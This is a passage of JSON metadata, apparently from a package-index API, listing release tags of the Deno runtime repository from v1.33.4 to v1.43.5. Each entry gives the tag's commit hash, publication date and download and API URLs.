cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","p